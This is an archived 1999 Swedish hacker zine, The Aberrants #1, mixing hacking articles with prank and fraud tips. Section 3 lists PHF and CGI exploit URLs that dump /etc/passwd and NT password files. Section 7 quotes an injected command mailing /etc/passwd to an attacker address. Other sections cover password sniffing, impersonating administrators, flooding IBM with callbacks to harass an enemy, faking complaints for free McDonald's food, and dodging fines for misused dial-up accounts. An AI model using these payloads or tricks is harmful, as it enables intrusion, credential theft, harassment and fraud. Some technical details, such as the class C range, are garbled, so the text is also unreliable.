OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%,,,,,????????????,,,,,,,??????????????,,,,???,,,,,,,,,,,%%
%%,,,??????????????,,,,,????????????????,,,???,??????????,%%
%%,,??????????????,,,,??????????????????,,???,??????????,,%%
%%,,????????????,,,,???????,,,,,????????,,,,,,,,,,,???,,,,%%
%%,,,????????,,,,,????????,,,,,?????????,,,,,,,,,???,,,,,,%%
%%,,????????,,,,????????????????????????,,,,,,,???,,,,,,,,%%
%%,????????,,,??????????????????????????,,,,,???,,,,???,,,%%
%%????????,,???????????,,,,,????????????,,????????,???,,,,%%
%%???????,???????????,,,,,,,???????????,?????????,???,,,,,%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Innehåll i The Aberrants Zine #1 10/9 -99:
1 . Disclaimer. av: BugpOwer
2 . Inledning. av: BugpOwer
3 . PHF tekniken. av: Neurotic^
4 . Problem? Ring IBM. av: dumone
5 . Gratis mat på McDonalds. av: j0h2n
6 . Class nätverk. av: Neurotic^
7 . IP spoofing. av: Neurotic^
8 . Ethernet sniffing. av: Neurotic^
9 . Data och nätverkssäkerhet Del 1. av: N3UR0
10. IIS4 Buggen av: dumone
11. Sanningen bakom Micosoft Co. av: Neurotic^
12. Utfors knasing. av: dumone
13. Nyheter av: Neurotic^
14. Prenumerations info.
[ ]*********************************************************************************[ ]
[1.] Disclaimer. av: BugpOwer [ ]
[ ]*********************************************************************************[ ]
Disclaimer är för rädda människor som tror att fabror blå ligger och vakar
över dom i deras garderob och att han när som helst skulle vara beredda på att hoppa
ut och lysa med deras löjliga Maglite ficklampor i huvudet på dom och fråga dumma
frågor. Så om ni väljer att göra något av det som finns i zinet så är det erat problem
och inte vårat.
[ ]*********************************************************************************[ ]
[2.] Inledning. av: BugpOwer [ ]
[ ]*********************************************************************************[ ]
Nu har efter många om och men ätnligen första nytt av The Aberrants Zine släppts.
Zinet är ett projekt som drivs av Level 8. Orsaken till at vi startade det hela var
som många andra att det behövs men faktum är att det behövs verkligen ett bra Zine
om H/C/N/S. Det finns för många exempel på zines som är riktigt jävla praktskit.
Vi ska försöka hålla andan uppe så långt som möjligt och våran ambition
är att hålla klassen uppe på zinet och inte lägga ner
det efter några fåtal nummer.
Vi har tyvärr ingen hemsida efter som en viss person stavade fel på The Aberrants
när han skulle regga våran domän men om du vill ladda ner vårat zine så kör vi för
närvarande på våran felstavade: http://www.the-abberrants.com. En ny domän
regestrering har gjorts och vi kommer förhoppningsvis att få upp sidan i tid till
nästa nummer som kommer att komma om ungefär en månad. Där kommer också ett arkiv
med alla nummer att finnas. En domän till Level 8 kommer också upp inom en snar framtid.
Level 8 består för närvarande av BugpOwer, Neurotic^, dumone, Phenomenia,
CryoCore, hecil och Knash^.
Tack för ordet.
[ ]*********************************************************************************[ ]
[3.] PHF Tekniken. av: Neurotic^ [ ]
[ ]*********************************************************************************[ ]
PHF tekniken är en gammal och känd bug som tillhör "underground" allmänbildningen.
Visst, den är så gott som död men det finns dock även nyheter inom den. Om man frågar
någon som man misstänker vara lite lam så brukar dom säga att dom använder sig av phf
och ftp. Det är så satans lamt juh, men det finns dock nya sorters phfbuggar. Jag
kallar inte det hacking nä, men vad ska man då definiera det som? För alla er som
använder phf och anser dig vara hacker, tänk om och försök förstå att hacking inte
handlar om 40 bytes i ditt fula opålitliga Internet Explorer! Alla fall, här är
nyheterna inom phf (jag har själv inte testat men jag antar att dom funkar eftersom
dom fanns med på bugtraq).
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/phf?Q=x%0aypcat%20passwd
/~root
/cgi-bin/test-cgi?* HTTP/1.0
/cgi-bin/nph-test-cgi?* HTTP/1.0
/samples/search/queryhit.html NT
/scripts/samples/search/webhits.exe NT
/_vti_pvt/service.pwd NT
Neurotic^
mixtile112@hotmail.com
Level 8
[ ]*********************************************************************************[ ]
[4.] Problem? Ring IBM. av: dumone [ ]
[ ]*********************************************************************************[ ]
Har du någon äcklig jävel i din närhet som du helst av allt skulle vilja skicka till
solen utan retur. Bra , här kommer ännu ett tips i högen för att jävlas med någon.
Ring 020-795 300 IBM direct service kontor, efter kl. 10 på kvällen eller något.
Då kommer du få tala in ett medelande på deras automatiska telefonsvarare. Tala då in
att du skulle vilja diskutera en affär eller något annat som låter viktigt och tala in
din oväns telefon nr. (hemtelefon nr givetvis :) ). Nu e det klart nu kommer IBM ringa
och fråga vad han ville. Upprepa den procedur varje kväll innan sängdags.
dumone
dumone@softhome.net
Level 8
[ ]*********************************************************************************[ ]
[5.] Gratis mat på McDonalds. av: j0h2n [ ]
[ ]*********************************************************************************[ ]
Personalen på McDonalds och liknande företag är väldigt rädda om sina kunder och för
stämmningar. Därför kan du juh utnyttja detta i illegalt syfte. Det finns minst 4
olika sätt att göra det på och alla gör så att du får billigare eller gratis mat. Det
första du kan göra är att beställa in en hamburgare och få den. Du bäter sedan nästan
hela hamburgaren så att det bara finns en liten del kvar. Du tar sedan ett hårstrå
och sätter det i hamburgaren. Efter det går du bara och klagar på att det är ett
hårstrå i hamurgaren. Personalen kollar inte ens om det finns något hårstrå. Man får
då direkt en ny hamburgare eller vad man vill ha. Det andra sättet funkar bäst om det
är mycket folk och vid lunchtid när personalen är stressad. Du går helt enkelt fram
till en kassa och säger ungefär såhär:
- Var är min Big Mac? Jag har väntat en kvart!
Du får förmodligen en Big Mac då eller vad du vill ha. Det tredje sättet är att
beställa en stor vatten och sedan spilla ut den. Du går sedan till en annan kassa
och säger att du råkade spilla ut din Sprite. Du får då en ny Sprite utan att betala.
Det fjärde är att bara gå fram till en kassa och säga att du tappat hela din bricka
med mat. Har du en helvetes tur får du nu en helt ny bricka med allt du vill ha.
Sammanfattning:
De flesta kände nog redan till dessa trix att käka gratis.
Tänk på att det är du som gör sånt här som håller priserna
på maten så höga. (Vem bryr sig? :) )
Och: Kommer dom på dig neka allt eller spring.
j0h2n
virus_5001@hotmail.com
http://www.pclamer.cjb.net
[ ]*********************************************************************************[ ]
[6.] Class nätverk. av: Neurotic^ [ ]
[ ]*********************************************************************************[ ]
Class nätverk är olika till för att kunna anpassa ett nätverk efter så
många host's som du har. Det delas upp i 5 olika delar, A, B, C, D och E
Jag kommer bara skriva om A B och C efter som min kunskap är begränsad
I framtiden kommer det troligtvis dyka upp fler txt filer från mig om
class nätverk men även en del inom nätverk generellt sätt.
Class nätverk är otroligt enkla att identifiera eftersom dom första bit'sen
i IP'n (även kallat octet) avslöjar vilken typ av class nätverk dom har.
Class A:
Tanken med A var/är att USA's regering men främst stora företag som behäver
mer än 65.000 host's skulle använda A.
A klarar upp till 16miljoner host's och äver 126 nätverk per A vilket är
otroligt mycket.
IP'n sträcker sig från 0.0.0.0 --> 127.255.255.255
Class B:
B är till får stora nätverk som inte kräver mer än 65.000 host's men
med B kan du ha upptill 16380 nätverk per B.
IP'n i detta fallet sträcker sig från 128.0.0.0 --> 191.255.255.255
Class C:
C är till för mindre företag som klarar sig med 1-254 host's men C liksom
B klarar många fler nätverk än A. C klarar hela 2097157 nätverk per C.
IP'n sträcker sig från 192.0.0.0 --> 223.255.255
Neurotic^
mixtile112@hotmail.com
Level 8
[ ]*********************************************************************************[ ]
[7.]IP spoofing. av: Neurotic^ [ ]
[ ]*********************************************************************************[ ]
IP SPOOFING - En genomgång över drömmen
Drömmen för många är att få vara osynliga på system och
olika sorters nätverk, detta är inte så lätt som många kan tro.
Jag själv har aldrig försökt mig på en tcp/ip attack i syfte med
spoofing. Jag har fått komentarer såsom "Om du nu inte är en lamer,
varför kör du inte genom proxy/wingate?", jag anser själv det vara
helt onödigt att använda sånt för att forwarda min IP. Notera att
detta inte är en spoofing attack. Varför vill man använda det för att
koppla upp sig mot IRC nätverk? Den frågan ställer jag mig ofta och
jag fann ett svar som jag tycker verkar rimligt. En som vill visa
det lilla han kan genom att använda wingates. Vad kan man göra som
är så olagligt på irc? Flooda? Spamma? eller rent av nuka? Då har
man verkligen visat vem som är wannabe och vem som är en seriös
användare. Visserligen finns det bra syfte med wingates/proxies.
Om man ska carda vilket är ett bra alternativ till att springa och
köpa en IBM med för instalerat windows och ett winmodem.
En wingate/proxy gör sig bäst i ett LAN/WAN, där kan man behöva "ligga"
bakom en säkrare och kraftfullare dator för att skydda mot eventuella
attacker
Jag vet hur en tcp/ip baserad IP spoofing attack fungerar och ser ut
För ett tag sen såg jag dom här underbara raderna i en text fil som
jag hadde liggande. Istället för att översätta och försöka få det att
låta som om det var mina ord så pasta jag det direkt.
"IP spoofing is where an attacker can predict the TCP sequence number
of a trusted TCP session between two other machines and hijacks the
session by modifying his IP address and injecting a single arbitary
command. Eg "cat /etc/passwd | mail hacker@here.org". Now this is
extremely advanced stuff and if you are reading this FYI, you probably
wont know what I am talking about. I only include this here to let you
know you cant use IP spoofing t o hide your IP address the way you want to"
Jag hoppas jag gett dig en inblick i hur en spoofing attack fungerar
(om du nu inte visste detta redan).
Vill du läsa mer så kan jag glädja dig, vi på Level8 innehar
många text filer som beskriver/förklarar olika sorters tcp/ip attacker.
Dom kommer självklart att finnas på vårt (level8's) arkiv
Neurotic^
mixtile112@hotmail.com
Level 8
[ ]*********************************************************************************[ ]
[8.] Ethernet sniffing. av: Neurotic^ [ ]
[ ]*********************************************************************************[ ]
Ethernet sniffing
Ethernet snifing är när du (med programvara)lyssnar efter lösenord.
Ett annat namn för denna konst är "Network monitoring"
När programmet (sniffern) hittar ett ord som matchar en viss kriteria
loggar den det och skickar det till en fil. Det den söker efter är
ex "login" och "password".
Att använda detta på en stor server kan ge en väldigt mycket
information som kan tjäna syfte.
Sniffers till dom vanliga OS'en kommer att finnas på level8's sida
när den väl kommer upp...
Neurotic^
mixtile112@hotmail.com
Level 8
[ ]*********************************************************************************[ ]
[9.] Data och Nätverkssäkerhet. Del 1. av: N3UR0 [ ]
[ ]*********************************************************************************[ ]
Här kommer första delen i en serie av artiklar om datasäkerhet och
nätverkssäkerhet av mig.
Jag uppmanar inte till brott. Hahaha!!!
Happy Reading! :-)
// N3UR0
Först lite allmänt om säkerhet i nätverk
Datalagen:
Enligt 21 S datalagen är det förbjudet att titta på, radera eller ändra andras
information i datorer och på datamedier, om man inte har tillstånd att göra det.
Det är också förbjudet att avlyssna datakommunikation.
(Så ta det lugnt nu va???)
Dåligt samspel är farligt!
Säkerheten i nätverk är ett ständigt problem för administratören, men det är
oftast först efter ett angrepp som frågan blir intressant.
Fortfarande är den egna personalen den största riskfaktorn, men vad händer när
företaget
angrips utifrån?
Tre kategorier...
Angreppen brukar delas in i tre kategorier. Det första och vanligaste är att det
drabbade företaget aldrig märker angreppet, som egentligen bara går ut på att
titta på hur systemet är uppbyggt.
Den andra kategorin är rena sabotage. Hemsidan kanske byts ut, en server tappar
kontakten med nätet, hårddiskar raderas och så vidare. (Elaka crackers som är i
farten..)
Den tredje och minst vanliga kategorin handlar om intrång i syfte att hitta
eller förändra information i vinstsyfte. Det kan vara prislistor som förändras,
eller lagerdatabaser som börjar tappa data till förmån för ett konkurrrerande
bolag. Detta är alltså industrispionage.
Jag menar vad gör inte dem multinationella företagen för pengar igentligen? För
många öppnas en ny värld efter ett intrång. Ordet säkerhet får en ny betydelse
för dem.
Vilka är det som har hand om säkerheten?
I dag styr en grupp administratörer och samordnare.
Dem samarbetar oftast med ett dataföretag som dem köpt allt av, så deras
servicetekniker hjälper till vid stora problem. Annars är det gruppens uppgift
att underhålla brandväggar och nätövervakningsutrustning. Dela ut rättigheter
och se till att system hålls vid liv.
Hur kan man komma in i nätverket?
Ett sätt att komma åt lösenord och användarnamn är att lyssna av det lokala
nätet med en "sniffer". All information ekas till alla anslutna arbetsstationer
när en användare loggar in, och genom att lyssna av nätet kan vem som helst
snappa upp informationen. Men vill man va lite iskall kan man köra lite social
ingejörskonst på någon anställd. Hur gör man då? Jo, frågar de anställda om
dessa uppgifter. Du kan till exempel utge dig för att vara en av
administratörerna på företaget och sedan utnyttja den anställdes godtrogenhet.
Det vanligaste sättet att attackera systemet är att försöka ta sig in från
Internet. Genom att utnyttja kända buggar i olika system kan du ta sig längre
och längre in i systemet.
Rena sabotage blir allt vanligare!!
Ett sätt som blivit populärt på senare tid är "SYN Flooding". Varje gång en
webserver vill koppla upp sig mot en annan skickar den en uppkopplingsförfrågan,
en SYN, som sedan besvaras med ett godkännande, ett ACK.
Genom att oavbrutet sända förfrågningar, från en dessutom falsk avsändare, sätts
webservern ur spel genom att hela tiden tvingas besvara anropen.
Säkerhet kostar..!
Många har levt med uppfattningen att säkerhet är gratis, eller följer med på
köpet. Nu måste företagen lära sig att också man behöver pengar för
säkerhetsarbetet.
Det är inte ett engångsarbete att titta över säkerheten och kanske installera en
brandvägg. All trafik genom en brandvägg måste hela tiden övervakas för att man
över huvud taget ska kunna upptäcka angrepp eller oegentligheter.
Dåligt med nätverkssäkerhet
Mindre än hälften av småföretagen har en policy för nätverkssäkerhet, trots att
de tänker ansluta sig till Internet inom ett år. Så är det i varje fall i USA,
enligt en färsk undersökning. Nu är det inte företagen själva som har svarat,
utan återförsäljare och nätverkskonsulter som bedömer sina kunder.
Färre än hälften av kunderna har en säkerhetspolicy, anser de tillfrågade
företagen. Endast tolv procent av dem har mer säkerhetsmedvetna kunder än så. En
säkerhetspolicy är regler för vem som får komma åt företagets dataresurser, och
under vilka omständigheter det får ske. Samtidigt kommer de flesta av dem att
vara anslutna till Internet inom ett år, trots att knappt hälften av dem är det
nu.
Som små företag räknas företag med högst 25 anställda. 78 procent av de
tillfrågade hade sådana företag som kunder.
Endast 34 procent av de tillfrågade kunde rapportera att deras kunder använder
en brandvägg som skydd mot dataintrång. Av dem som har en brandvägg har 58
procent bara en router.
53 procent har ingen annan datasäkerhet än lösenord, och 32 procent har ingen
datasäkerhet alls.
Så ni förstår läget nu va? Säkerhet är visst nåt som är inbyggt från början och
följer med vid köp eller?
Nu är den här artikeln slut, men nästa del kommer i nästa nummer. Det är bara
att hålla ut..
N3UR0
count_zero_interrupt@usa.net
[ ]*********************************************************************************[ ]
[10] IIS4 Bug av: dumone [ ]
[ ]*********************************************************************************[ ]
IIS4 buggen är en bug i följande av microsofts system:
Internet infomation server 4.0 (IIS4)
Microsoft windows NT 4.0 Service Pack 3 Option Pack 4
Microsoft windows NT 4.0 Service Pack 4 Option Pack 4
Microsoft windows NT 4.0 Service Pack 5 Option Pack 4
Felet i hela systemet är det att filändelserna .ASP, .IDC, .HTR i dessa system är till
för att skicka URL.en till DLL filer som sedan hanterar datat.
Själva felet ligger i ISAPI.DLL för om den inte är bunden rätt kan en buffer overflow
attack göra så man kan starta kod på servern remote.
HTR filerna som man kör buffer overflow attacken genom är till för att windows NT användare
ska kunna ändra sitt password via en nät katalog t.ex. /johan_e/ .
Det man kan göra med IIS4 är att crasha hela servern om man kör en bufferoverflow.
dumone
dumone@softhome.net
Level 8
[ ]*********************************************************************************[ ]
[11] Sanningen bakom Microsoft CO. av: Neurotic^ [ ]
[ ]*********************************************************************************[ ]
Sanningen bakom Microsoft Co.
Många hävdar att microsoft är ett mjukvaro företag som inte
gör något annat. Jag Neurotic har kartlagt deras beteende och
vanor, min slutsats är att dom är en ond rasistisk rörelse.
Mitt bevis finns att hitta på
http://nyheter.idg.se/display.pl?ID=990701-PFA1
Skriver man ordet "monkey" i publicher så kommer det upp en bild
på en apa som sitter på en bänk. Jag visste hela tiden att det
var mer än ett mjukvaro företag..
Detta är kanske lite humor men att dom är rasistiska stämmer..
10 If kkk$ = "insecure" then goto 20 else end
20 input "Tell me the name of the most insecure OS"; ms$
30 IF ms$ = "microsoft" then goto 40 else goto 20
Neurotic^
mixtile112@hotmail.com
Level 8
[ ]*********************************************************************************[ ]
[12] Utfors knasing. av: dumone [ ]
[ ]*********************************************************************************[ ]
Fler och fler surfar utfors på deras 0200 Nod'er som e gratis i kostar bara 23 öre i
uppkopplings avgift. Nu i veckan fick jag höra för första gången om någon som hade
knasat, zid- på #felia-020. Han knasade för ca 6-7 månader sedan han hade surfat
100 timmar ungefär på olika konton det han åkte fasst för var när kunden ringde in
till polisen o anmälde det hela. Enligt zid- själv så var det utfors som gav böterna
o inte snuten och det krävs en rättslig prövning i domstol osv. om det inte rörsig om
ordningsböter såsom trafik böter osv. Zid- fick en lapp i brevlådan där stod att han
skulle betala böterna 3000 :- + 1000 :- som han hade surfat för.
Visst utfors kan skicka ut en lapp och 'be' en betala men man måste inte eftersom dom kan
intetvinga en till det utan en rättslig prövning i en domstol.
Och om utfors skulle anmäla dataintrånget som det sätts upp som så skulle dom inte inneha
mer bevis än en datalogg och i dag räcker inte en datalogg som tillräkligt bevis för att
väcka åtal i svensk domstol.
T.ex. när spray hackern blev upptäckt var dom ju tvungna att ta och sno hans dator genom
husransakan innan dom kunde väcka åtal.
Därimot kan åklagaren om han e riktigt jävlig je husransaknings tillstånd så bengen kommer
hemoch letar RAS i din dator och rör runt bland alla din fina tencho mp3or :) .
Jag har pratat med en som studerade juridik och en advokat på IRC + att jaghar läst mycket
i min SO bok, (den man trodde man alldrig skulle ha nytta av) :).
Slutsats: Får du en lapp om böter från utfors så VÄGRA betala utan rättslig prövning,
dvs med lite tur klarar du dig undan helt efter som åklagaren inte väcker åtal.
dumone
dumone@softhome.net
Level 8
[ ]*********************************************************************************[ ]
[13] Nyheter. [ ]
[ ]*********************************************************************************[ ]
Antionline stämmer Harvard, HNC skapar protester mot anitonline
John Vranesevich, från www.antionline.com hotar Harvard med stämmning
med anledning av innehållet i katalogen jp/ på packetstorm-security's
web sida som låg på http://packetstorm.harvard.edu
John Vranesevich påstår att dom använde servern för att trakasera
och hota honom och hans familj och hans affärer
Detta resulterade att sidan och allt material är nere.
Enligt Jeff Moss så ska allt material vara raderat, medans man
kan läsa på hackernews.com att allt är räddat. Vad är rätt?
Själv så tyckte jag ganska bra om packetstorm security och
jag stöder dem till 100% i kampen mot JP
Läs mer om det på http://www.hack-net.com/antionline/
Källa: www.hack-net.com & www.hackernews.com
[ ]*********************************************************************************[ ]
[14] Prenumerera nu! [ ]
[ ]*********************************************************************************[ ]
Om du vill starta en prenumeration på TA vilket du naturligtvis vill så ska du skicka
ett E-Mail till the.aberrants@level8.cjb.net med ämnet subscribe-ta eller något i den stilen.
Om du vill sluta prenumerera så kan du skicka va fan du vill till dev/null.
Vi behöver artiklar till nästa nummer dessa kan du skicka till ovanstående address
d.v.s the.aberrants@level8.cjb.net. Kändiskap och snygga brudar utlovas till alla
som skriver en artikel.
[ ]*********************************************************************************[ ]